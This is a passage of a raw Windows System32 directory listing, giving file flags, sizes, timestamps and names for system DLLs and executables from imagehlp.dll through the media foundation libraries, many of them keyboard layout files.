imagehlp.dll +F 23542784 09/15/2018 07:28:25 imageres.dll +F 694784 09/15/2018 07:28:25 imagesp1.dll +F 137216 09/15/2018 07:29:18 imapi.dll +F 519680 09/15/2018 07:29:16 imapi2.dll +F 994304 09/15/2018 07:29:18 imapi2fs.dll +D 0 09/15/2018 07:33:50 IME +F 56320 09/15/2018 07:29:18 imgutil.dll +F 177176 03/07/2020 00:53:55 imm32.dll +F 136704 09/15/2018 07:28:58 immersivetpmvscmgrsvr.exe +F 134456 03/07/2020 00:53:44 ImplatSetup.dll +F 248832 03/07/2020 00:54:13 IndexedDbLegacy.dll +F 1002496 09/15/2018 07:29:20 inetcomm.dll +F 2096640 03/07/2020 00:54:13 inetcpl.cpl +F 66560 09/15/2018 07:29:14 inetmib1.dll +F 177664 09/15/2018 07:29:24 inetpp.dll +F 34304 09/15/2018 07:29:24 inetppui.dll +F 85504 09/15/2018 07:29:20 INETRES.dll +D 0 09/15/2018 07:33:50 inetsrv +F 13312 09/15/2018 07:28:56 InfDefaultInstall.exe +F 266240 09/15/2018 07:28:44 InkEd.dll +F 932352 09/15/2018 07:28:32 InkObjCore.dll +F 59904 09/14/2018 18:04:00 InprocLogger.dll +F 363320 03/07/2020 00:53:53 input.dll +F 63488 09/15/2018 07:29:13 InputController.dll +F 833064 03/07/2020 00:53:41 InputHost.dll +F 110592 09/15/2018 07:28:30 InputInjectionBroker.dll +F 138752 03/07/2020 00:53:40 InputLocaleManager.dll +D 0 09/15/2018 07:33:50 InputMethod +F 5528576 03/07/2020 00:53:40 InputService.dll +F 487936 03/07/2020 00:53:53 InputSwitch.dll +F 1284 09/15/2018 07:28:22 InputSystemToastIcon.contrast-white.png +F 917 09/15/2018 07:28:22 InputSystemToastIcon.png +F 116736 09/15/2018 07:29:16 inseng.dll +F 1671680 03/07/2020 00:53:41 InstallService.dll +F 215552 03/07/2020 00:53:41 InstallServiceTasks.dll +F 751104 09/14/2018 17:56:00 internetmail.dll +F 95232 09/14/2018 17:58:00 InternetMailCsp.dll +F 491520 03/07/2020 00:53:43 intl.cpl +F 465424 03/07/2020 00:53:51 invagent.dll +F 2560 09/15/2018 07:28:52 iologmsg.dll +F 174080 03/07/2020 00:53:31 IoTAssignedAccessLockFramework.dll +F 148000 09/15/2018 09:09:56 iotstartup.exe +F 34816 09/15/2018 07:29:14 ipconfig.exe +F 70656 09/15/2018 07:28:39 IPELoggingDictationHelper.dll +F 241944 03/07/2020 00:53:26 IPHLPAPI.DLL +F 834048 03/07/2020 00:53:44 iphlpsvc.dll +D 0 09/15/2018 07:33:50 Ipmi +F 629760 03/07/2020 00:53:45 ipnathlp.dll +F 32256 09/15/2018 07:28:57 IpNatHlpClient.dll +F 11776 09/15/2018 07:28:57 iprtprio.dll +F 565760 03/07/2020 00:53:45 iprtrmgr.dll +F 830976 09/15/2018 07:28:50 ipsecsnp.dll +F 447488 09/15/2018 07:28:50 IPSECSVC.DLL +F 510976 09/15/2018 07:28:50 ipsmsnap.dll +F 64512 09/15/2018 07:28:20 ipxlatcfg.dll +F 19968 09/15/2018 07:29:24 irclass.dll +F 186368 09/15/2018 07:29:24 irftp.exe +F 50616 09/15/2018 07:28:51 iri.dll +F 24576 09/15/2018 07:29:24 irmon.dll +F 423424 09/15/2018 07:29:24 irprops.cpl +F 155648 09/15/2018 07:29:16 iscsicli.exe +F 229376 09/15/2018 07:29:18 iscsicpl.dll +F 122368 09/15/2018 07:29:18 iscsicpl.exe +F 76288 09/15/2018 07:29:16 iscsidsc.dll +F 12288 09/15/2018 07:29:17 iscsied.dll +F 151552 09/15/2018 07:29:16 iscsiexe.dll +F 16896 09/15/2018 07:28:18 iscsilog.dll +F 35840 09/15/2018 07:29:17 iscsium.dll +F 77824 03/07/2020 00:54:11 iscsiwmi.dll +F 130048 09/15/2018 07:29:17 iscsiwmiv2.dll +F 1715712 03/07/2020 00:53:41 ISM.dll +F 118784 09/15/2018 07:29:18 isoburn.exe +D 0 09/15/2018 09:09:27 it-IT +F 199168 09/15/2018 07:29:16 itircl.dll +F 173568 03/07/2020 00:54:15 itss.dll +F 51360 09/15/2018 07:28:59 iuilp.dll +F 24472 09/15/2018 07:29:13 iumbase.dll +F 66624 09/15/2018 07:28:59 iumcrypt.dll +F 15728 09/15/2018 07:29:13 iumdll.dll +F 22624 09/15/2018 07:29:13 IumSdk.dll +F 54272 09/15/2018 07:29:21 iyuv_32.dll +D 0 03/07/2020 00:55:54 ja-jp +F 96768 09/15/2018 07:29:16 JavaScriptCollectionAgent.dll +F 55808 09/15/2018 07:28:56 joinproviderol.dll +F 152576 09/15/2018 07:28:56 joinutil.dll +F 98304 09/15/2018 07:29:14 joy.cpl +F 714240 03/07/2020 00:53:42 JpMapControl.dll +F 377344 03/07/2020 00:53:31 jpndecoder.dll +F 54784 09/15/2018 07:28:22 jpninputrouter.dll +F 289792 03/07/2020 00:53:31 jpnranker.dll +F 244224 03/07/2020 00:53:28 JpnServiceDS.dll +F 840192 03/07/2020 00:54:11 jscript.dll +F 4872704 03/07/2020 00:54:12 jscript9.dll +F 703488 03/07/2020 00:54:13 jscript9diag.dll +F 53248 09/15/2018 07:28:50 jsproxy.dll +F 6948 09/15/2018 07:29:22 kanji_1.uce +F 8484 09/15/2018 07:29:22 kanji_2.uce +F 8192 09/15/2018 07:28:52 kbd101.dll +F 7680 09/15/2018 07:28:52 kbd101a.dll +F 7680 09/15/2018 07:28:52 kbd101b.dll +F 7680 09/15/2018 07:28:52 kbd101c.dll +F 7680 09/15/2018 07:28:53 kbd103.dll +F 8192 09/15/2018 07:28:52 kbd106.dll +F 8192 09/15/2018 07:28:52 kbd106n.dll +F 7680 09/15/2018 07:28:53 KBDA1.DLL +F 7168 09/15/2018 07:28:52 KBDA2.DLL +F 7680 09/15/2018 07:28:52 KBDA3.DLL +F 8192 09/15/2018 07:28:52 KBDAL.DLL +F 7168 09/15/2018 07:28:52 KBDARME.DLL +F 7680 09/15/2018 07:28:52 kbdarmph.dll +F 7680 09/15/2018 07:28:52 kbdarmty.dll +F 7168 09/15/2018 07:28:52 KBDARMW.DLL +F 8192 09/15/2018 07:28:52 kbdax2.dll +F 7680 09/15/2018 07:28:52 KBDAZE.DLL +F 7680 09/15/2018 07:28:52 KBDAZEL.DLL +F 7680 09/15/2018 07:28:52 KBDAZST.DLL +F 7680 09/15/2018 07:28:52 KBDBASH.DLL +F 7680 09/15/2018 07:28:52 KBDBE.DLL +F 8192 09/15/2018 07:28:52 KBDBENE.DLL +F 7680 09/15/2018 07:28:52 KBDBGPH.DLL +F 7680 09/15/2018 07:28:52 KBDBGPH1.DLL +F 7680 09/15/2018 07:28:52 KBDBHC.DLL +F 7680 09/15/2018 07:28:53 KBDBLR.DLL +F 7680 09/15/2018 07:28:52 KBDBR.DLL +F 7680 09/15/2018 07:28:53 KBDBU.DLL +F 7680 09/15/2018 07:28:52 KBDBUG.DLL +F 7680 09/15/2018 07:28:52 KBDBULG.DLL +F 8192 09/15/2018 07:28:52 KBDCA.DLL +F 9216 09/15/2018 07:28:52 KBDCAN.DLL +F 7680 09/15/2018 07:28:52 KBDCHER.DLL +F 17408 09/15/2018 07:28:52 KBDCHERP.DLL +F 8704 09/15/2018 07:28:52 KBDCR.DLL +F 8704 09/15/2018 07:28:52 KBDCZ.DLL +F 8704 09/15/2018 07:28:52 KBDCZ1.DLL +F 8704 09/15/2018 07:28:52 KBDCZ2.DLL +F 7680 09/15/2018 07:28:52 KBDDA.DLL +F 7680 09/15/2018 07:28:53 KBDDIV1.DLL +F 7680 09/15/2018 07:28:52 KBDDIV2.DLL +F 7168 09/15/2018 07:28:52 KBDDV.DLL +F 7680 09/15/2018 07:28:53 KBDDZO.DLL +F 8192 09/15/2018 07:28:52 KBDES.DLL +F 7680 09/15/2018 07:28:52 KBDEST.DLL +F 7168 09/15/2018 07:28:52 KBDFA.DLL +F 7680 09/15/2018 07:28:52 kbdfar.dll +F 8192 09/15/2018 07:28:52 KBDFC.DLL +F 7680 09/15/2018 07:28:52 KBDFI.DLL +F 8704 09/15/2018 07:28:52 KBDFI1.DLL +F 7680 09/15/2018 07:28:52 KBDFO.DLL +F 7680 09/15/2018 07:28:52 KBDFR.DLL +F 7680 09/15/2018 07:28:53 KBDFTHRK.DLL +F 7680 09/15/2018 07:28:52 KBDGAE.DLL +F 7168 09/15/2018 07:28:52 KBDGEO.DLL +F 7680 09/15/2018 07:28:52 kbdgeoer.dll +F 7680 09/15/2018 07:28:52 kbdgeome.dll +F 7680 09/15/2018 07:28:52 kbdgeooa.dll +F 7680 09/15/2018 07:28:52 kbdgeoqw.dll +F 8192 09/15/2018 07:28:52 KBDGKL.DLL +F 8192 09/15/2018 07:28:53 KBDGN.DLL +F 7680 09/15/2018 07:28:52 KBDGR.DLL +F 8192 09/15/2018 07:28:52 KBDGR1.DLL +F 8704 09/15/2018 07:28:52 KBDGRLND.DLL +F 7680 09/15/2018 07:28:52 KBDGTHC.DLL +F 7168 09/15/2018 07:28:52 KBDHAU.DLL +F 7680 09/15/2018 07:28:53 KBDHAW.DLL +F 7680 09/15/2018 07:28:52 KBDHE.DLL +F 8192 09/15/2018 07:28:52 KBDHE220.DLL +F 7680 09/15/2018 07:28:52 KBDHE319.DLL +F 7168 09/15/2018 07:28:52 KBDHEB.DLL +F 7680 09/15/2018 07:28:52 kbdhebl3.dll +F 8192 09/15/2018 07:28:52 KBDHELA2.DLL +F 8192 09/15/2018 07:28:52 KBDHELA3.DLL +F 10240 09/15/2018 07:28:52 KBDHEPT.DLL +F 8192 09/15/2018 07:28:52 KBDHU.DLL +F 7680 09/15/2018 07:28:52 KBDHU1.DLL +F 8704 09/15/2018 07:28:53 kbdibm02.dll +F 8192 09/15/2018 07:28:53 KBDIBO.DLL +F 7168 09/15/2018 07:28:52 KBDIC.DLL +F 7680 09/15/2018 07:28:52 KBDINASA.DLL +F 7680 09/15/2018 07:28:52 KBDINBE1.DLL +F 7680 09/15/2018 07:28:52 KBDINBE2.DLL +F 8192 09/15/2018 07:28:52 KBDINBEN.DLL +F 7680 09/15/2018 07:28:52 KBDINDEV.DLL +F 9216 09/15/2018 07:28:52 KBDINEN.DLL +F 7680 09/15/2018 07:28:52 KBDINGUJ.DLL +F 7680 09/15/2018 07:28:52 KBDINHIN.DLL +F 7680 09/15/2018 07:28:52 KBDINKAN.DLL +F 8192 09/15/2018 07:28:52 KBDINMAL.DLL +F 7680 09/15/2018 07:28:52 KBDINMAR.DLL +F 8192 09/15/2018 07:28:52 KBDINORI.DLL +F 7680 09/15/2018 07:28:52 KBDINPUN.DLL +F 7680 09/15/2018 07:28:52 KBDINTAM.DLL +F 7680 09/15/2018 07:28:52 KBDINTEL.DLL +F 8704 09/15/2018 07:28:52 KBDINUK2.DLL +F 7168 09/15/2018 07:28:52 KBDIR.DLL +F 7168 09/15/2018 07:28:53 KBDIT.DLL +F 7680 09/15/2018 07:28:52 KBDIT142.DLL +F 8192 09/15/2018 07:28:52 KBDIULAT.DLL +F 7680 09/15/2018 07:28:53 KBDJAV.DLL +F 15872 09/15/2018 07:28:53 KBDJPN.DLL +F 7680 09/15/2018 07:28:52 KBDKAZ.DLL +F 7680 09/15/2018 07:28:53 KBDKHMR.DLL +F 7680 09/15/2018 07:28:52 KBDKNI.DLL +F 15360 09/15/2018 07:28:53 KBDKOR.DLL +F 7680 09/15/2018 07:28:53 KBDKURD.DLL +F 7168 09/15/2018 07:28:53 KBDKYR.DLL +F 8192 09/15/2018 07:28:52 KBDLA.DLL +F 7680 09/15/2018 07:28:53 KBDLAO.DLL +F 7680 09/15/2018 07:28:52 kbdlisub.dll +F 7680 09/15/2018 07:28:52 kbdlisus.dll +F 8704 09/15/2018 07:28:53 kbdlk41a.dll +F 7168 09/15/2018 07:28:52 KBDLT.DLL +F 7680 09/15/2018 07:28:52 KBDLT1.DLL +F 7680 09/15/2018 07:28:52 KBDLT2.DLL +F 7680 09/15/2018 07:28:52 KBDLV.DLL +F 8192 09/15/2018 07:28:52 KBDLV1.DLL +F 9216 09/15/2018 07:28:52 KBDLVST.DLL +F 7680 09/15/2018 07:28:52 KBDMAC.DLL +F 7680 09/15/2018 07:28:52 KBDMACST.DLL +F 7680 09/15/2018 07:28:53 KBDMAORI.DLL +F 7680 09/15/2018 07:28:52 KBDMLT47.DLL +F 7680 09/15/2018 07:28:52 KBDMLT48.DLL +F 7680 09/15/2018 07:28:53 KBDMON.DLL +F 7680 09/15/2018 07:28:53 KBDMONMO.DLL +F 7680 09/15/2018 07:28:52 KBDMONST.DLL +F 7680 09/15/2018 07:28:52 KBDMYAN.DLL +F 7680 09/15/2018 07:28:53 KBDNE.DLL +F 8704 09/15/2018 07:28:52 kbdnec.dll +F 8704 09/15/2018 07:28:52 kbdnec95.dll +F 10752 09/15/2018 07:28:53 kbdnecat.dll +F 9216 09/15/2018 07:28:52 kbdnecnt.dll +F 8192 09/15/2018 07:28:53 KBDNEPR.DLL +F 7168 09/15/2018 07:28:52 kbdnko.dll +F 7680 09/15/2018 07:28:53 KBDNO.DLL +F 8704 09/15/2018 07:28:52 KBDNO1.DLL +F 8704 09/15/2018 07:28:52 KBDNSO.DLL +F 7680 09/15/2018 07:28:52 KBDNTL.DLL +F 7680 09/15/2018 07:28:52 KBDOGHAM.DLL +F 7680 09/15/2018 07:28:52 KBDOLCH.DLL +F 7680 09/15/2018 07:28:53 KBDOLDIT.DLL +F 7680 09/15/2018 07:28:53 KBDOSM.DLL +F 7680 09/15/2018 07:28:53 KBDPASH.DLL +F 7680 09/15/2018 07:28:52 kbdphags.dll +F 8192 09/15/2018 07:28:52 KBDPL.DLL +F 8192 09/15/2018 07:28:52 KBDPL1.DLL +F 8192 09/15/2018 07:28:52 KBDPO.DLL +F 8704 09/15/2018 07:28:52 KBDRO.DLL +F 9216 09/15/2018 07:28:52 KBDROPR.DLL +F 9216 09/15/2018 07:28:52 KBDROST.DLL +F 7168 09/15/2018 07:28:52 KBDRU.DLL +F 7680 09/15/2018 07:28:52 KBDRU1.DLL +F 9216 09/15/2018 07:28:52 KBDRUM.DLL +F 8192 09/15/2018 07:28:52 KBDSF.DLL +F 8704 09/15/2018 07:28:52 KBDSG.DLL +F 8192 09/15/2018 07:28:52 KBDSL.DLL +F 8704 09/15/2018 07:28:52 KBDSL1.DLL +F 9216 09/15/2018 07:28:52 KBDSMSFI.DLL +F 9216 09/15/2018 07:28:52 KBDSMSNO.DLL +F 7168 09/15/2018 07:28:52 KBDSN1.DLL +F 7680 09/15/2018 07:28:53 KBDSORA.DLL +F 8704 09/15/2018 07:28:52 KBDSOREX.DLL +F 8192 09/15/2018 07:28:52 KBDSORS1.DLL +F 8704 09/15/2018 07:28:52 KBDSORST.DLL +F 7680 09/15/2018 07:28:52 KBDSP.DLL +F 7680 09/15/2018 07:28:52 KBDSW.DLL +F 8192 09/15/2018 07:28:52 KBDSW09.DLL +F 7680 09/15/2018 07:28:52 KBDSYR1.DLL +F 7680 09/15/2018 07:28:52 KBDSYR2.DLL +F 7680 09/15/2018 07:28:52 KBDTAILE.DLL +F 7680 09/15/2018 07:28:52 KBDTAJIK.DLL +F 7680 09/15/2018 07:28:52 KBDTAM99.DLL +F 7680 09/15/2018 07:28:53 KBDTAT.DLL +F 7680 09/15/2018 07:28:52 KBDTH0.DLL +F 7680 09/15/2018 07:28:52 KBDTH1.DLL +F 7680 09/15/2018 07:28:52 KBDTH2.DLL +F 7680 09/15/2018 07:28:52 KBDTH3.DLL +F 7680 09/15/2018 07:28:52 KBDTIFI.DLL +F 7680 09/15/2018 07:28:52 KBDTIFI2.DLL +F 8192 09/15/2018 07:28:53 KBDTIPRC.DLL +F 8704 09/15/2018 07:28:52 KBDTIPRD.DLL +F 7680 09/15/2018 07:28:52 KBDTT102.DLL +F 8704 09/15/2018 07:28:52 KBDTUF.DLL +F 8192 09/15/2018 07:28:52 KBDTUQ.DLL +F 7680 09/15/2018 07:28:53 KBDTURME.DLL +F 8192 09/15/2018 07:28:52 KBDTZM.DLL +F 7680 09/15/2018 07:28:53 KBDUGHR.DLL +F 7680 09/15/2018 07:28:52 KBDUGHR1.DLL +F 7168 09/15/2018 07:28:52 KBDUK.DLL +F 8704 09/15/2018 07:28:53 KBDUKX.DLL +F 7168 09/15/2018 07:28:53 KBDUR.DLL +F 7680 09/15/2018 07:28:52 KBDUR1.DLL +F 7168 09/15/2018 07:28:53 KBDURDU.DLL +F 9728 09/15/2018 07:28:46 KBDUS.DLL +F 7680 09/15/2018 07:28:52 KBDUSA.DLL +F 7680 09/15/2018 07:28:52 KBDUSL.DLL +F 7680 09/15/2018 07:28:52 KBDUSR.DLL +F 8192 09/15/2018 07:28:52 KBDUSX.DLL +F 7680 09/15/2018 07:28:53 KBDUZB.DLL +F 7680 09/15/2018 07:28:52 KBDVNTC.DLL +F 7680 09/15/2018 07:28:52 KBDWOL.DLL +F 7680 09/15/2018 07:28:53 KBDYAK.DLL +F 7680 09/15/2018 07:28:52 KBDYBA.DLL +F 7680 09/15/2018 07:28:52 KBDYCC.DLL +F 9216 09/15/2018 07:28:52 KBDYCL.DLL +F 15672 09/15/2018 07:28:46 kd.dll +F 28672 09/15/2018 07:28:45 kdcom.dll +F 27136 03/07/2020 00:53:31 kdcpw.dll +F 21304 09/15/2018 07:29:13 kdhvcom.dll +F 121656 03/07/2020 00:53:54 kdnet.dll +F 17920 09/15/2018 07:29:16 kdnet_uart16550.dll +F 84480 03/07/2020 00:53:26 KdsCli.dll +F 24376 09/15/2018 07:28:46 kdstub.dll +F 44856 09/15/2018 07:29:14 kdusb.dll +F 31232 09/15/2018 07:29:16 kd_02_10df.dll +F 379392 09/15/2018 07:29:16 kd_02_10ec.dll +F 26624 09/15/2018 07:29:16 kd_02_1137.dll +F 216576 09/15/2018 07:29:16 kd_02_14e4.dll +F 44032 09/15/2018 07:29:16 kd_02_15b3.dll +F 43520 09/15/2018 07:29:16 kd_02_1969.dll +F 31232 09/15/2018 07:29:16 kd_02_19a2.dll +F 20480 09/15/2018 07:29:16 kd_02_1af4.dll +F 251904 09/15/2018 07:29:16 kd_02_8086.dll +F 18944 09/15/2018 07:29:16 kd_07_1415.dll +F 41472 09/15/2018 07:29:16 kd_0C_8086.dll +F 74240 09/15/2018 07:28:34 keepaliveprovider.dll +F 152408 03/07/2020 00:53:28 KerbClientShared.dll +F 1005056 03/07/2020 00:53:28 kerberos.dll +F 58880 09/15/2018 07:28:34 kernel.appcore.dll +F 725696 03/07/2020 00:53:52 kernel32.dll +F 2701816 03/07/2020 00:53:54 KernelBase.dll +F 841 09/15/2018 07:28:22 KeyboardSystemToastIcon.contrast-white.png +F 523 09/15/2018 07:28:22 KeyboardSystemToastIcon.png +F 53248 09/15/2018 07:28:51 KeyCredMgr.dll +F 90624 03/07/2020 00:53:26 keyiso.dll +F 166400 09/15/2018 07:28:58 keymgr.dll +F 118784 09/15/2018 07:28:39 KeywordDetectorMsftSidAdapter.dll +F 37376 09/15/2018 07:29:21 klist.exe +F 48128 09/15/2018 07:28:57 kmddsp.tsp +F 256512 03/07/2020 00:53:33 KnobsCore.dll +F 120320 09/15/2018 07:28:25 KnobsCsp.dll +D 0 09/15/2018 09:09:27 ko-KR +F 12876 09/15/2018 07:29:22 korean.uce +F 37888 09/15/2018 07:29:22 ksetup.exe +F 280576 09/15/2018 07:29:22 ksproxy.ax +F 102400 09/15/2018 07:29:24 kstvtune.ax +F 23264 09/15/2018 07:28:22 ksuser.dll +F 137216 09/15/2018 07:29:22 Kswdmcap.ax +F 66560 09/15/2018 07:29:24 ksxbar.ax +F 17920 09/15/2018 07:29:14 ktmutil.exe +F 24064 09/15/2018 07:28:52 ktmw32.dll +F 71168 09/15/2018 07:28:25 l2gpstore.dll +F 62464 09/15/2018 07:28:25 l2nacp.dll +F 200192 09/15/2018 07:28:26 L2SecHC.dll +F 92672 09/15/2018 09:10:04 l3codeca.acm +F 183296 09/15/2018 09:10:04 l3codecp.acm +F 16896 09/15/2018 07:29:14 label.exe +F 14336 09/15/2018 07:28:53 LangCleanupSysprepAction.dll +F 177152 03/07/2020 00:53:43 LanguageComponentsInstaller.dll +F 51712 09/15/2018 07:28:53 LanguageComponentsInstallerComHandler.exe +F 312320 03/07/2020 00:53:31 LanguageOverlayServer.dll +F 120544 09/15/2018 07:28:22 LanguageOverlayUtil.dll +F 68096 09/15/2018 07:28:53 LanguagePackDiskCleanup.dll +F 13312 09/15/2018 09:09:54 LAPRXY.DLL +F 190760 09/15/2018 07:28:39 LaptopPlugInToastImg.gif +F 149056 09/15/2018 07:28:22 LargeRoom.bin +F 184320 09/15/2018 07:28:42 LaunchTM.exe +F 43520 09/15/2018 07:28:44 LaunchWinApp.exe +F 211938 09/15/2018 07:29:18 lcphrase.tbl +F 24114 09/15/2018 07:29:18 lcptr.tbl +F 68608 09/15/2018 07:28:38 LegacyNetUX.dll +F 197120 09/15/2018 07:28:38 LegacyNetUXHost.exe +F 47104 09/15/2018 07:28:36 lfsvc.dll +F 1609728 09/15/2018 09:08:41 libcrypto.dll +F 1045816 09/15/2018 07:28:34 LicenseManager.dll +F 94720 09/15/2018 07:28:36 LicenseManagerApi.dll +F 47616 09/15/2018 07:28:36 LicenseManagerShellext.exe +F 49664 09/15/2018 07:28:34 LicenseManagerSvc.dll +D 0 09/15/2018 07:33:50 Licenses +F 160768 03/07/2020 00:53:35 LicensingCSP.dll +F 226816 09/15/2018 07:28:29 licensingdiag.exe +F 363520 03/07/2020 00:53:46 LicensingDiagSpp.dll +F 149232 03/07/2020 00:53:53 LicensingUI.exe +F 736272 03/07/2020 00:53:52 LicensingWinRT.dll +F 32768 09/15/2018 07:29:16 licmgr10.dll +F 30720 09/15/2018 07:28:59 linkinfo.dll +F 276992 09/15/2018 07:29:25 ListSvc.dll +F 48128 09/15/2018 07:28:50 lltdapi.dll +F 2560 09/15/2018 07:28:50 lltdres.dll +F 266240 09/15/2018 07:28:50 lltdsvc.dll +F 27136 09/15/2018 07:28:45 lmhsvc.dll +F 122880 09/15/2018 07:28:51 loadperf.dll +F 806568 03/07/2020 00:53:26 locale.nls +F 509440 09/15/2018 07:29:16 localsec.dll +F 1221120 03/07/2020 00:53:33 localspl.dll +F 18944 09/15/2018 07:28:56 localui.dll +F 400384 09/15/2018 07:29:20 LocationApi.dll +F 2084352 03/07/2020 00:53:40 LocationFramework.dll +F 86016 03/07/2020 00:53:40 LocationFrameworkInternalPS.dll +F 40248 09/15/2018 07:28:36 LocationFrameworkPS.dll +F 67584 09/15/2018 07:29:19 LocationNotificationWindows.exe +F 115200 09/15/2018 07:29:19 LocationWinPalMisc.dll +F 11264 09/15/2018 07:28:42 Locator.exe +F 450048 03/07/2020 00:53:43 LockAppBroker.dll +F 90608 03/07/2020 00:53:43 LockAppHost.exe +F 736256 03/07/2020 00:53:43 LockController.dll +F 440832 03/07/2020 00:53:43 LockHostingFramework.dll +F 162304 09/15/2018 07:28:24 LockScreenContent.dll +F 45568 09/15/2018 07:28:25 LockScreenContentHost.dll +F 48224 09/15/2018 07:28:24 LockScreenContentServer.exe +F 374272 03/07/2020 00:53:43 LockScreenData.dll +F 50176 09/15/2018 07:28:51 lodctr.exe +F 109568 09/15/2018 09:10:01 logagent.exe +D 0 03/29/2020 11:29:52 LogFiles +F 81920 09/15/2018 07:29:21 loghours.dll +F 114688 09/15/2018 07:29:20 logman.exe +F 23040 09/15/2018 09:10:03 logoff.exe +F 253256 03/07/2020 00:53:26 logoncli.dll +F 794112 03/07/2020 00:53:57 LogonController.dll +F 13824 09/15/2018 07:28:45 LogonUI.exe +F 1332224 03/07/2020 00:54:18 lpasvc.dll +F 3072 09/15/2018 07:28:47 lpk.dll +F 41984 03/07/2020 00:53:43 lpkinstall.exe +F 739840 03/07/2020 00:53:43 lpksetup.exe +F 10240 09/15/2018 07:28:53 lpksetupproxyserv.dll +F 57856 09/15/2018 07:28:53 lpremove.exe +F 278416 03/07/2020 00:53:28 LsaIso.exe +F 1674752 03/07/2020 00:53:28 lsasrv.dll +F 57880 09/15/2018 07:28:46 lsass.exe +F 63488 03/07/2020 00:54:24 LSCSHostPolicy.dll +F 658432 03/07/2020 00:53:53 lsm.dll +F 46080 09/15/2018 07:29:22 lsmproxy.dll +F 27136 09/15/2018 09:10:03 lstelemetry.dll +D 0 09/15/2018 09:09:27 lt-LT +F 59192 09/15/2018 07:28:25 luainstall.dll +F 34816 09/15/2018 07:29:25 luiapi.dll +F 144998 09/15/2018 07:28:44 lusrmgr.msc +D 0 09/15/2018 09:09:27 lv-LV +F 3072 09/15/2018 07:28:50 lz32.dll +F 9926 09/15/2018 07:28:46 l_intl.nls +D 0 09/15/2018 07:33:50 Macromed +F 50688 09/15/2018 07:28:43 Magnification.dll +F 832512 09/15/2018 07:28:44 Magnify.exe +D 0 09/15/2018 09:09:27 MailContactsCalendarSync +F 645632 09/15/2018 07:28:56 main.cpl +F 76288 09/15/2018 07:28:53 MaintenanceUI.dll +F 83456 09/15/2018 07:28:45 makecab.exe +F 225280 09/15/2018 09:10:00 manage-bde.exe +F 874 09/15/2018 07:29:54 manage-bde.wsf +F 566272 03/07/2020 00:53:41 MapConfiguration.dll +F 271360 03/07/2020 00:53:42 MapControlCore.dll +F 2560 09/15/2018 07:28:34 MapControlStringsRes.dll +F 2842112 03/07/2020 00:53:41 MapGeocoder.dll +F 148480 03/07/2020 00:53:53 mapi32.dll +F 148480 03/07/2020 00:53:53 mapistub.dll +F 3399168 03/07/2020 00:53:42 MapRouter.dll +F 138240 09/15/2018 07:28:34 MapsBtSvc.dll +F 15360 09/15/2018 07:28:34 MapsBtSvcProxy.dll +F 98304 09/15/2018 07:28:34 MapsCSP.dll +F 1176064 03/07/2020 00:53:42 MapsStore.dll +F 30720 09/15/2018 07:28:34 MapsTelemetry.dll +F 54272 09/15/2018 07:28:34 mapstoasttask.dll +F 43520 09/15/2018 07:28:34 mapsupdatetask.dll +F 185352 09/15/2018 09:09:59 mavinject.exe +F 926208 03/07/2020 00:53:40 MbaeApi.dll +F 1133568 03/07/2020 00:53:40 MbaeApiPublic.dll +F 116224 09/15/2018 07:29:20 MbaeParserTask.exe +F 51200 09/15/2018 07:29:20 MbaeXmlParser.dll +F 804352 09/15/2018 07:29:19 mblctr.exe +F 465408 03/07/2020 00:53:43 MBMediaManager.dll +F 860160 03/07/2020 00:53:46 MBR2GPT.EXE +F 667648 09/15/2018 07:28:34 mbsmsapi.dll +F 86528 09/15/2018 07:28:36 mbussdapi.dll +F 94208 03/07/2020 00:53:43 mcbuilder.exe +F 178688 09/14/2018 18:01:00 MCCSEngineShared.dll +F 20992 09/14/2018 18:04:00 MCCSPal.dll +F 98816 09/15/2018 07:29:22 mciavi32.dll +F 48640 09/15/2018 07:28:20 mcicda.dll +F 43008 09/15/2018 07:29:21 mciqtz32.dll +F 30720 09/15/2018 07:28:20 mciseq.dll +F 34304 03/07/2020 00:53:31 mciwave.dll +F 1022976 03/07/2020 00:54:09 MCRecvSrc.dll +F 83984 09/15/2018 07:28:52 mcupdate_AuthenticAMD.dll +F 1580048 09/15/2018 07:28:52 mcupdate_GenuineIntel.dll +F 458240 09/15/2018 09:10:02 MDEServer.exe +F 111616 03/07/2020 00:53:32 MDMAgent.exe +F 148480 03/07/2020 00:54:09 MDMAppInstaller.exe +F 184832 09/15/2018 07:28:22 MdmCommon.dll +F 818688 03/07/2020 00:53:57 MdmDiagnostics.dll +F 51712 03/07/2020 00:53:43 MdmDiagnosticsTool.exe +F 179712 09/15/2018 07:29:23 mdminst.dll +F 59904 09/15/2018 07:28:50 mdmlocalmanagement.dll +F 140288 03/07/2020 00:53:58 mdmmigrator.dll +F 74752 03/07/2020 00:53:58 mdmpostprocessevaluator.dll +F 246784 03/07/2020 00:53:43 mdmregistration.dll +F 87040 09/15/2018 07:29:24 MdRes.exe +F 92160 09/15/2018 07:29:24 MdSched.exe +F 132096 09/15/2018 07:28:58 MediaFoundation.DefaultPerceptionProvider.dll +F 1284 09/15/2018 07:28:22 MediaSystemToastIcon.contrast-white.png +F 854 09/15/2018 07:28:22 MediaSystemToastIcon.png +F 110036 09/15/2018 07:28:22 MediumRoom.bin +F 32768 09/15/2018 07:29:24 MemoryDiagnostic.dll +F 1096704 09/15/2018 07:28:36 MessagingDataModel2.dll +F 55296 09/15/2018 07:28:20 MessagingService.dll +F 506408 03/07/2020 00:53:28 mf.dll +F 60928 03/07/2020 00:53:55 mf3216.dll +F 139088 09/15/2018 09:10:03 mfAACEnc.dll +F 2273296 03/07/2020 00:54:26 mfasfsrcsnk.dll +F 148992 09/15/2018 09:10:02 mfaudiocnv.dll +F 1415680 03/07/2020 00:53:52 mfc42.dll +F 1446400 03/07/2020 00:53:52 mfc42u.dll +F 518720 09/15/2018 09:10:02 MFCaptureEngine.dll +F 5436904 03/07/2020 00:54:26 mfcore.dll +F 35840 09/15/2018 07:28:42 mfcsubs.dll +F 1102896 09/15/2018 09:09:56 mfds.dll +F 147456 09/15/2018 09:10:00 mfdvdec.dll +F 70656 09/15/2018 09:10:04 mferror.dll +F 51200 09/15/2018 09:09:58 mfh263enc.dll +F 560128 03/07/2020 00:54:27 mfh264enc.dll +F 282112 09/15/2018 07:29:22 mfksproxy.dll +F 4920832 03/07/2020 00:54:26 MFMediaEngine.dll +F 98816 09/15/2018 09:09:59 mfmjpegdec.dll +F 1257984 09/15/2018 09:10:02 mfmkvsrcsnk.dll +F 2751336 03/07/2020 00:54:26 mfmp4srcsnk.dll +F 1201128 03/07/2020 00:54:26 mfmpeg2srcsnk.dll +F 1156456 09/15/2018 09:10:00 mfnetcore.dll +F 1665400 09/15/2018 09:09:59 mfnetsrc.dll +F 1233592 09/15/2018 09:10:02 mfperfhelper.dll +F 